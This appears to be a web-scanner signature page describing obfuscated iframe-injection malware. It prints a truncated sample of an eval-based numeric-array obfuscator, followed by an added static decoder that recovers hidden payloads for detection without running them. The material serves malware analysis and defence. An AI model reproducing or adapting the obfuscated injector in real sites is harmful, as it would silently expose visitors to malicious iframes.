SiteCheck Signatures


malware.encrypted_iframe_injection

Description:
Obfuscated code that injects malicious iframes into a web page.

There are many different ways to obfuscate code that injects iframes. For example:

try{1-​prototype;}catch(​bsdtwbd){q=412;}
if(020=​=0x10){f=[​94,108,100,91,107,95,103,101,22,94,105,...skipped...,94,105,99,57,91,90,51];}if(window.document)e=​eval​;w=f;s=[];r=String.​fromCharCode;for(i=0;-i+283!=0;i+=1){j=i;if(​e)s=s+r((w[j]*1+(8+e("j"+"%3"))));}
if(q&&f&&012===10)e​(s);

Affecting: Any web site (no specific target).

This kind of malware was very popular back in 2008-2012, when the main infection vector was compromised FTP credentials.
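A script like the sample above can be triaged statically instead of being run: its loop builds each character as w[j] + 8 + (j % 3) before passing the result to eval. The following added example (not SiteCheck's own code or detection logic) generalizes that to a small search over offsets and moduli; the function names, the indicator list and the sample array are constructed for illustration.

```javascript
// Added example: static decoder for numeric-array obfuscation (nothing is eval'd).
const INDICATORS = /<iframe|document\.write|createElement|function\s/i;

// Constructed sample in the style of the page's snippet; it hides only
// document.write("<iframe>") and is never executed.
const CONSTRUCTED_SAMPLE =
  'if(020==0x10){f=[92,102,89,109,100,91,102,107,36,111,105,95,108,92,' +
  '30,26,51,95,94,105,87,101,92,52,26,32];}';

// Pull out every numeric array literal with at least minLen elements.
function extractArrays(source, minLen = 8) {
  const clean = source.replace(/[\u200B-\u200D\uFEFF]/g, ''); // zero-width chars
  const arrays = [];
  for (const m of clean.matchAll(/\[\s*(\d+(?:\s*,\s*\d+)+)\s*\]/g)) {
    const values = m[1].split(',').map(Number);
    if (values.length >= minLen) arrays.push(values);
  }
  return arrays;
}

// The sample's transform: charCode = value + base + (index % mod).
function decode(values, base, mod) {
  return String.fromCharCode(...values.map((v, i) => v + base + (i % mod)));
}

const isPrintable = (text) => /^[\t\n\r\x20-\x7e]*$/.test(text);

// Try small (base, mod) pairs; report the first fully printable decoding
// that contains an injection indicator.
function analyze(source) {
  const findings = [];
  for (const values of extractArrays(source)) {
    search:
    for (let mod = 1; mod <= 8; mod++) {
      for (let base = -32; base <= 32; base++) {
        const text = decode(values, base, mod);
        if (isPrintable(text) && INDICATORS.test(text)) {
          findings.push({ base, mod, text });
          break search;
        }
      }
    }
  }
  return findings;
}

console.log(analyze(CONSTRUCTED_SAMPLE));
```

Run against only the visible start of the page's array, the same search recovers base 8 and modulus 3 and the plaintext begins with `function fr`.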